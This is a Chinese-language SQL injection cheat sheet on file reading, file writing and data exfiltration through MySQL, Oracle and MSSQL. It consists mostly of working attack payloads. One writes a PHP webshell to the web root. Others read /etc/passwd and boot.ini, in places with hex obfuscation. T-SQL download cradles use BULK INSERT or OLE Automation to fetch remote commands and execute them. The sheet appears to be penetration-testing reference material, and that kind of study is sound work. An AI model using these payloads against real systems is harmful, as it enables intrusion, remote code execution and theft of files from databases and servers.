读取和写入文件有助于数据收集和数据泄露。许多方法包括写入webroot,这可以执行webshell,或允许数据通过端口80/443被泄露。
*需要特权用户
| 描述 | 语句 |
|---|---|
| 转储到文件 | SELECT * FROM mytable INTO dumpfile '/tmp/somefile' |
| 写入 PHP Shell 到文件 | SELECT 'system($_GET['c']); ?>' INTO OUTFILE '/var/www/shell.php' |
| 读文件 | SELECT LOAD_FILE('/etc/passwd') |
| 读取混淆的文件 | SELECT LOAD_FILE(0x633A5C626F6F742E696E69) reads c:\boot.ini |
| 文件权限 | SELECT file_priv FROM mysql.user WHERE user = 'netspi' SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%netspi%' |
有时可以使用UTL_FILE。检查以下是否为非null
SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
如果安装了Java(Oracle Express中不可用),可用于读取和写入文件。
*需要特权用户
| 描述 | 语句 |
|---|---|
| 在服务器中下载Cradle bulk - TSQL | -- Bulk Insert - Download Cradle Example -- Setup variables Declare @cmd varchar(8000) -- Create temp table CREATE TABLE #file (content nvarchar(4000)); -- Read file into temp table - web server must support propfind BULK INSERT #file FROM '\sharepoint.acme.com@SSL\Path\to\file.txt'; -- Select contents of file SELECT @cmd = content FROM #file -- Display command SELECT @cmd -- Run command EXECUTE(@cmd) -- Drop the temp table DROP TABLE #file |
| 下载Cradle OAP 1 - SQL | -- OLE Automation Procedure - Download Cradle Example -- Does not require a table, but can't handle larger payloads -- Note: This also works with unc paths \\ip\file.txt -- Note: This also works with webdav paths \ip@80\file.txt However, the target web server needs to support propfind. -- Setup Variables DECLARE @url varchar(300) DECLARE @WinHTTP int DECLARE @handle int DECLARE @Command varchar(8000 -- Set target url containting TSQL SET @url = 'http://127.0.0.1/mycmd.txt' -- Setup namespace EXEC @handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT -- Call the Open method to setup the HTTP request EXEC @handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false' -- Call the Send method to send the HTTP GET request EXEC @handle=sp_OAMethod @WinHTTP,'Send' -- Capture the HTTP response content EXEC @handle=sp_OAGetProperty @WinHTTP,'ResponseText', @Command out -- Destroy the object EXEC @handle=sp_OADestroy @WinHTTP -- Display command SELECT @Command -- Run command EXECUTE (@Command) |
| 下载Cradle OAP 2 - TSQL | -- OLE Automation Procedure - Download Cradle Example - Option 2 -- Can handle larger payloads, but requires a table -- Note: This also works with unc paths \ip\file.txt -- Note: This also works with webdav paths \ip@80\file.txt However, the target web server needs to support propfind. -- Setup Variables DECLARE @url varchar(300) DECLARE @WinHTTP int DECLARE @Handle int DECLARE @Command varchar(8000) -- Set target url containting TSQL SET @url = 'http://127.0.0.1/mycmd.txt' -- Create temp table to store downloaded string CREATE TABLE #text(html text NULL) -- Setup namespace EXEC @Handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT -- Call open method to configure HTTP request EXEC @Handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false' -- Call Send method to send the HTTP request EXEC @Handle=sp_OAMethod @WinHTTP,'Send' -- Capture the HTTP response content INSERT #text(html) EXEC @Handle=sp_OAGetProperty @WinHTTP,'ResponseText' -- Destroy the object EXEC @Handle=sp_OADestroy @WinHTTP -- Display the commad SELECT @Command = html from #text SELECT @Command -- Run the command EXECUTE (@Command) -- Remove temp table DROP TABLE #text |
| 读取文件 - TSQL | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceTxt.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_BulkInsert.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceXlsx https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetBulk.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetTxt.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetXlsx.sql |
| 写文件 - TSQL | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_bulkinsert.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_OpenRowSetTxt.sql |